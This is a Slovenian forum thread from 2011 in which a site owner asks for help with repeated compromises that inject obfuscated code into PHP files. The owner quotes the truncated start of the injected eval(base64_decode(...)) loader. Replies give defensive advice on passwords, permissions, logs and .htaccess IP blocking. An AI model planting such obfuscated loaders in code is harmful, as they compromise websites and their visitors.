Stalno vdiranje na spletno stran

15715894

12. sep 2011 ob 07:58

Zadnje čase se mi na spletni strani, ki sploh ni live, dogajajo neprestani vdori, ki pa jih ni v nobenem logu. Po vdoru je skoraj vsem php datotekam dodana neka čudna koda, takoj za <?php :
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDAp................

stran se potem normalno sesuva vsako jutro :(

Ima kdo kako idejo kaj naredit preden grem s stranjo live?

5082

spletni strežniki php

bostjan

643689309

12. sep 2011 ob 08:01

O joj....da ti nekdo nekaj dodaja v PHP mora biti pa nekaj resno narobe s strežnikom ali pa samo php skripto.

Par zadev kar bi jaz naredil:
1. nadrgadil vse programe na zadnjo verzijo
2. popravil pravice na datotekah
3. in najbolj pomembno pogledal vso kodo, prebral veliko na temo PHP varnost, pregledal koda potem pa bi še enkrat dobro pogledal kodo!

11

sloslo

15715894

12. sep 2011 ob 08:05

Bostjan, nekaj mora bit resno narobe.

Gre za kupljeno skripto, ki je nadgrajena
pravice na datotekah so 644
gledam kodo, brišem to sra*** oziroma nalagam backupe.

Se vam zdi možno, da nekdo, ki proda skripto, neprestano potem vdira (glede na to da ni nobenega supporta, ter da smo s prodajalcem skripte že bolj kot ne na bojni nogi)

OvcaX

275145711194281

12. sep 2011 ob 08:12

Si zamenjal ftp geslo?
Tega je zadnje čase dokaj veliko, vsaj pri nas.

1

sloslo

15715894

12. sep 2011 ob 08:16

OvcaX:
Si zamenjal ftp geslo?
Tega je zadnje čase dokaj veliko, vsaj pri nas.

Danes še zadnjega (svojega!)

bostjan

643689309

12. sep 2011 ob 08:20

načeloma če je php, preglej malo kodo

kot drugo....če je server slabo skonfiguriran in je na njem še kakšna druga stran....se zna naredit, da to delajo preko tiste strani

je pa zelo čudno, da tega ni v logu, ker če je napad preko http-ja bi skoraj moralo biti v apache logih

Jure Damjan

4162422244655

12. sep 2011 ob 09:07

Preglej računalnik za trojance, in iz Filezille, ali svojega FTP programa izbriši shranjena gesla.

Leo

6035711354

12. sep 2011 ob 09:12

Kakšna pa je koda, če jo decodaš s tem http://www.opinionatedgeek.com/dotnet/tools/base64decode/?

bilten

10416121190116

12. sep 2011 ob 09:45

Običajno so to pirshing napadi v kodi je redirekt na kao neke ponarejen strani spletnih bank ali kaj podbenga da se lovijo nadalja gesla. Večina teh napadov oz do strani pridejo z brut napadi na ftp torej je tako kot pravi žabec rešitev v tem da so gesla dovolj varna da ne dobijo teh podatkov. Drugo je da to pridobijo z raznimi trojanci na osebnih računalnikih in prensonikih in poberejo gesla iz slabih fto clientov.

SlimDeluxe

122310221449

12. sep 2011 ob 09:51

Preko apache error/access loga dobi IP in mu s htaccess prepreči dostop
<Limit GET HEAD POST>
order allow, deny
deny from nek.ip
allow from all
</Limit>

Ali pa morda bannaj vse in dovoli samo tvoj ip
<Limit GET HEAD POST>
order deny,allow
deny from all
allow from tvoj.ip
</Limit>

Samo možnost je, da uporablja proxy in ga bo zamenjal, tako da to je začasna rešitev.
Ta čas glede na vpise v zgoraj omenjenih logih ugotovi, katera skripta je problematična. Verjetno je kakšna forma nezaščitena.

1

jWeb

3654511195

12. sep 2011 ob 11:27

sloslo, sporoči mi na PM celo kodo in bom preveril, kaj dejansko naredi...

Stalno vdiranje na spletno stran

17 naročnikov

31 odgovorov

Stalno vdiranje na spletno stran 17 naročnikov

31 odgovorov

Stalno vdiranje na spletno stran

17 naročnikov